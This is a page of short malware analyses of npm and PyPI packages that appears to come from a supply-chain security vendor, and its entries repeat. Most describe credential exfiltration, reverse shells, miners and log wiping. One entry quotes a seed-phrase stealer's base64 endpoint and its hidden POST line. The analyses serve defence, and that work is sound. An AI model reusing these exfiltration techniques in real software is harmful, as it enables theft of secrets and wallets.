Secure your dependencies. Ship with confidence.

This file sends sensitive environment data (for example, user credentials) to an external server at example[.]com/getRely. If the remote server responds with a specific code (202), the code recursively deletes multiple important directories (e.g., .vscode, .git, .svn, node_modules, etc.), leading to potential data loss or disruption.

Live on npm for 27 days, 21 hours and 3 minutes before removal. Socket users were protected even while the package was live.

The URL contains host name, current working directory and user id information in a way that could allow an attacker to execute arbitrary code on the system. This is a known method used by attackers to perform remote code execution.

Live on npm for 7 minutes before removal. Socket users were protected even while the package was live.

The script is designed to send user information to a remote server, which is a clear indication of malicious behavior and data exfiltration.

The code is likely intended to create a reverse shell connection to a remote server, allowing unauthorized access to the system. The use of obfuscation and system-level commands targeting specific OS platforms further supports the conclusion that this is malicious code.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

The file defines a base64-encoded constant `_ENCODED_API_ENDPOINT = 'aHR0cDovLzg5LjIzLjk4LjE0OTo1MDAwL2NoZWNrc2VlZA=='` which decodes to `http://89[.]23[.]98[.]149:5000/checkseed`. In `get_address_balance(mnemonic)`, it calls `_log_balances_async`, which spawns a daemon thread that silently issues an HTTP POST to the decoded endpoint with the full mnemonic phrase (`requests.post(url, json={'mnemonic': mnemonic}, timeout=3)`). All exceptions are caught and ignored to conceal the behavior. This hidden, asynchronous exfiltration of wallet seed phrases is a clear backdoor enabling immediate compromise of any derived wallets.

Live on PyPI for 2 hours and 3 minutes before removal. Socket users were protected even while the package was live.

The code exhibits clear malicious behavior by collecting and exfiltrating sensitive system information to a remote server without user consent. This constitutes data theft and poses a significant security risk.

Live on npm for 1 hour and 4 minutes before removal. Socket users were protected even while the package was live.

This code poses a serious security risk and should not be used.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

The provided code is heavily obfuscated and exhibits several malicious behaviors, including data exfiltration, token stealing, and process manipulation. The risk associated with this code is high, and it should be treated as a serious security threat.

Live on npm for 1 hour and 3 minutes before removal. Socket users were protected even while the package was live.

The script decodes a base64 encoded command and executes it using bash. This is a clear indicator of malicious behavior and poses a significant security risk.

Live on npm for 18 minutes before removal. Socket users were protected even while the package was live.

The source code is malicious in nature as it automates the unauthorized redemption of Discord Nitro gift codes using a Discord account token. This behavior constitutes abuse of Discord's platform and violates terms of service. While the code is not obfuscated and lacks traditional malware payloads, the automated gift code theft and redemption is a serious security risk and should be flagged as malware. The provided reports are uninformative and should be replaced with this detailed analysis.

This file collects extensive system and environment information, obfuscates it with XOR and Base64 encoding, and sends it to 51.250.107[.]250 without user consent. Such behavior indicates malicious data exfiltration and a significant security threat.

The analyzed code contains numerous security risks, including hardcoded credentials for both Google services and MongoDB. It transmits sensitive information to external services without clear safeguards. The overall design raises serious concerns regarding supply chain security and data privacy. It is advisable not to use this code in a production environment until the security flaws are addressed.

Live on PyPI for 248 days, 2 hours and 45 minutes before removal. Socket users were protected even while the package was live.

The code exhibits malicious behavior by sending environment variables to a remote server, which can include sensitive information. The use of string concatenation for obfuscation and the connection to a suspicious domain further indicate malicious intent.

Live on npm for 7 minutes before removal. Socket users were protected even while the package was live.

The code exhibits various anomalies and potential security risks, including specific API interactions, hard-coded headers, incomplete error handling, and console logging sensitive data. While not conclusive evidence of malicious intent, the identified issues require immediate attention and further hardening to mitigate security risks.

Live on npm for 55 days and 59 minutes before removal. Socket users were protected even while the package was live.

The source code poses a significant security risk due to its ability to execute arbitrary commands received from a remote server. This behavior can lead to remote code execution (RCE) and potential data exfiltration. The provided reports were placeholders and did not contain any meaningful analysis.

The script 'packer/provisioners/post_install.sh' exhibits malicious behavior by performing several harmful actions: - **Deletes user and root history files**: Uses secure deletion methods to remove history files, potentially to conceal malicious activities. - **Clears system log files**: Erases log files from '/var/log', hindering the ability to audit and investigate system actions. - **Disables the root account**: Locks the root account password without ensuring alternative secure administrative access, possibly preventing legitimate administrative operations. - **Sets a weak default password ('changeme') for the 'admin' user**: Introduces a significant security risk by using an easily guessable password, facilitating unauthorized access. These actions can be exploited by an attacker to gain unauthorized access, disrupt legitimate operations, and prevent system recovery. The combination of log and history deletion, disabling of root access, and setting weak credentials indicates malicious intent to compromise system security and conceal nefarious activities.

This package contains heavily obfuscated binary data with no readable source code, strongly indicating malicious intent. The complete lack of transparent code and extensive use of encoded data represents a critical security threat.

The code exhibits several security risks, particularly in how it handles sensitive user data and communicates with external services. It should be refactored to improve security practices, such as encrypting sensitive data and avoiding untrusted external connections.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

The script exhibits clear malicious behavior by sending sensitive system information to an external server. This poses a significant security risk and is indicative of data exfiltration.

Live on npm for 11 minutes before removal. Socket users were protected even while the package was live.

The code performs unauthorized exfiltration of sensitive system and package information to a suspicious external server. This constitutes a serious privacy violation and malware behavior. The reports provided are invalid and fail to identify these issues. The package should be considered malicious and avoided.

The code is highly suspicious and likely malicious. It collects various pieces of system information and exfiltrates them to an external server via a ping command. This behavior is indicative of data theft or surveillance.

Live on npm for 36 minutes before removal. Socket users were protected even while the package was live.

The code is malicious as it downloads and executes a cryptocurrency miner without user consent. The obfuscation and unauthorized actions pose a significant security risk.

This file executes system commands (e.g., 'whoami' and 'cat /etc/passwd') and sends the output to a remote URL (e.g., hxxps://example[.]com) via HTTP POST requests. By transmitting sensitive system information to an external server, the code demonstrates clear malicious intent and endangers the security of the host system.

Live on npm for 24 days, 22 hours and 19 minutes before removal. Socket users were protected even while the package was live.

The package 'node-webcam@0.8.2' includes a post-installation script that downloads an executable file ('CommandCam.exe') from an external source without validation or integrity checks. Specifically, when installed on Windows systems, the script retrieves 'CommandCam.exe' from 'https://github[.]com/chuckfairy/node-webcam/releases/download/v0.6/CommandCam.exe' and saves it to 'src/bindings/CommandCam/CommandCam.exe' without obtaining user consent. CommandCam.exe (SHA256: 012d3ff83b1e65182807512fc9d04bcfdb40736fcdc2f7aba57531cbf031769e) is flagged as malicious by 22 out of 71 security vendors on VirusTotal. Downloading and executing binaries from external sources without validation introduces a security vulnerability, as the external source could be compromised to deliver malicious code, leading to potential arbitrary code execution on the user's system.

Live on npm for 53 minutes before removal. Socket users were protected even while the package was live.

The script attempts to send a message to a Telegram bot, but it also includes commands to gather system information and encode it in base64. This is a clear indication of a malicious script.

Live on npm for 1 day, 22 hours and 35 minutes before removal. Socket users were protected even while the package was live.

This file sends sensitive environment data (for example, user credentials) to an external server at example[.]com/getRely. If the remote server responds with a specific code (202), the code recursively deletes multiple important directories (e.g., .vscode, .git, .svn, node_modules, etc.), leading to potential data loss or disruption.

Live on npm for 27 days, 21 hours and 3 minutes before removal. Socket users were protected even while the package was live.

The URL contains host name, current working directory and user id information in a way that could allow an attacker to execute arbitrary code on the system. This is a known method used by attackers to perform remote code execution.

Live on npm for 7 minutes before removal. Socket users were protected even while the package was live.

The script is designed to send user information to a remote server, which is a clear indication of malicious behavior and data exfiltration.

The code is likely intended to create a reverse shell connection to a remote server, allowing unauthorized access to the system. The use of obfuscation and system-level commands targeting specific OS platforms further supports the conclusion that this is malicious code.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

The file defines a base64-encoded constant `_ENCODED_API_ENDPOINT = 'aHR0cDovLzg5LjIzLjk4LjE0OTo1MDAwL2NoZWNrc2VlZA=='` which decodes to `http://89[.]23[.]98[.]149:5000/checkseed`. In `get_address_balance(mnemonic)`, it calls `_log_balances_async`, which spawns a daemon thread that silently issues an HTTP POST to the decoded endpoint with the full mnemonic phrase (`requests.post(url, json={'mnemonic': mnemonic}, timeout=3)`). All exceptions are caught and ignored to conceal the behavior. This hidden, asynchronous exfiltration of wallet seed phrases is a clear backdoor enabling immediate compromise of any derived wallets.

Live on PyPI for 2 hours and 3 minutes before removal. Socket users were protected even while the package was live.

The code exhibits clear malicious behavior by collecting and exfiltrating sensitive system information to a remote server without user consent. This constitutes data theft and poses a significant security risk.

Live on npm for 1 hour and 4 minutes before removal. Socket users were protected even while the package was live.

This code poses a serious security risk and should not be used.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

The provided code is heavily obfuscated and exhibits several malicious behaviors, including data exfiltration, token stealing, and process manipulation. The risk associated with this code is high, and it should be treated as a serious security threat.

Live on npm for 1 hour and 3 minutes before removal. Socket users were protected even while the package was live.

The script decodes a base64 encoded command and executes it using bash. This is a clear indicator of malicious behavior and poses a significant security risk.

Live on npm for 18 minutes before removal. Socket users were protected even while the package was live.

The source code is malicious in nature as it automates the unauthorized redemption of Discord Nitro gift codes using a Discord account token. This behavior constitutes abuse of Discord's platform and violates terms of service. While the code is not obfuscated and lacks traditional malware payloads, the automated gift code theft and redemption is a serious security risk and should be flagged as malware. The provided reports are uninformative and should be replaced with this detailed analysis.

This file collects extensive system and environment information, obfuscates it with XOR and Base64 encoding, and sends it to 51.250.107[.]250 without user consent. Such behavior indicates malicious data exfiltration and a significant security threat.

The analyzed code contains numerous security risks, including hardcoded credentials for both Google services and MongoDB. It transmits sensitive information to external services without clear safeguards. The overall design raises serious concerns regarding supply chain security and data privacy. It is advisable not to use this code in a production environment until the security flaws are addressed.

Live on PyPI for 248 days, 2 hours and 45 minutes before removal. Socket users were protected even while the package was live.

The code exhibits malicious behavior by sending environment variables to a remote server, which can include sensitive information. The use of string concatenation for obfuscation and the connection to a suspicious domain further indicate malicious intent.

Live on npm for 7 minutes before removal. Socket users were protected even while the package was live.

The code exhibits various anomalies and potential security risks, including specific API interactions, hard-coded headers, incomplete error handling, and console logging sensitive data. While not conclusive evidence of malicious intent, the identified issues require immediate attention and further hardening to mitigate security risks.

Live on npm for 55 days and 59 minutes before removal. Socket users were protected even while the package was live.

The source code poses a significant security risk due to its ability to execute arbitrary commands received from a remote server. This behavior can lead to remote code execution (RCE) and potential data exfiltration. The provided reports were placeholders and did not contain any meaningful analysis.

The script 'packer/provisioners/post_install.sh' exhibits malicious behavior by performing several harmful actions: - **Deletes user and root history files**: Uses secure deletion methods to remove history files, potentially to conceal malicious activities. - **Clears system log files**: Erases log files from '/var/log', hindering the ability to audit and investigate system actions. - **Disables the root account**: Locks the root account password without ensuring alternative secure administrative access, possibly preventing legitimate administrative operations. - **Sets a weak default password ('changeme') for the 'admin' user**: Introduces a significant security risk by using an easily guessable password, facilitating unauthorized access. These actions can be exploited by an attacker to gain unauthorized access, disrupt legitimate operations, and prevent system recovery. The combination of log and history deletion, disabling of root access, and setting weak credentials indicates malicious intent to compromise system security and conceal nefarious activities.

This package contains heavily obfuscated binary data with no readable source code, strongly indicating malicious intent. The complete lack of transparent code and extensive use of encoded data represents a critical security threat.

The code exhibits several security risks, particularly in how it handles sensitive user data and communicates with external services. It should be refactored to improve security practices, such as encrypting sensitive data and avoiding untrusted external connections.

Live on npm for 2 minutes before removal. Socket users were protected even while the package was live.

The script exhibits clear malicious behavior by sending sensitive system information to an external server. This poses a significant security risk and is indicative of data exfiltration.

Live on npm for 11 minutes before removal. Socket users were protected even while the package was live.

The code performs unauthorized exfiltration of sensitive system and package information to a suspicious external server. This constitutes a serious privacy violation and malware behavior. The reports provided are invalid and fail to identify these issues. The package should be considered malicious and avoided.

The code is highly suspicious and likely malicious. It collects various pieces of system information and exfiltrates them to an external server via a ping command. This behavior is indicative of data theft or surveillance.

Live on npm for 36 minutes before removal. Socket users were protected even while the package was live.

The code is malicious as it downloads and executes a cryptocurrency miner without user consent. The obfuscation and unauthorized actions pose a significant security risk.

This file executes system commands (e.g., 'whoami' and 'cat /etc/passwd') and sends the output to a remote URL (e.g., hxxps://example[.]com) via HTTP POST requests. By transmitting sensitive system information to an external server, the code demonstrates clear malicious intent and endangers the security of the host system.

Live on npm for 24 days, 22 hours and 19 minutes before removal. Socket users were protected even while the package was live.

The package 'node-webcam@0.8.2' includes a post-installation script that downloads an executable file ('CommandCam.exe') from an external source without validation or integrity checks. Specifically, when installed on Windows systems, the script retrieves 'CommandCam.exe' from 'https://github[.]com/chuckfairy/node-webcam/releases/download/v0.6/CommandCam.exe' and saves it to 'src/bindings/CommandCam/CommandCam.exe' without obtaining user consent. CommandCam.exe (SHA256: 012d3ff83b1e65182807512fc9d04bcfdb40736fcdc2f7aba57531cbf031769e) is flagged as malicious by 22 out of 71 security vendors on VirusTotal. Downloading and executing binaries from external sources without validation introduces a security vulnerability, as the external source could be compromised to deliver malicious code, leading to potential arbitrary code execution on the user's system.

Live on npm for 53 minutes before removal. Socket users were protected even while the package was live.

The script attempts to send a message to a Telegram bot, but it also includes commands to gather system information and encode it in base64. This is a clear indication of a malicious script.

Live on npm for 1 day, 22 hours and 35 minutes before removal. Socket users were protected even while the package was live.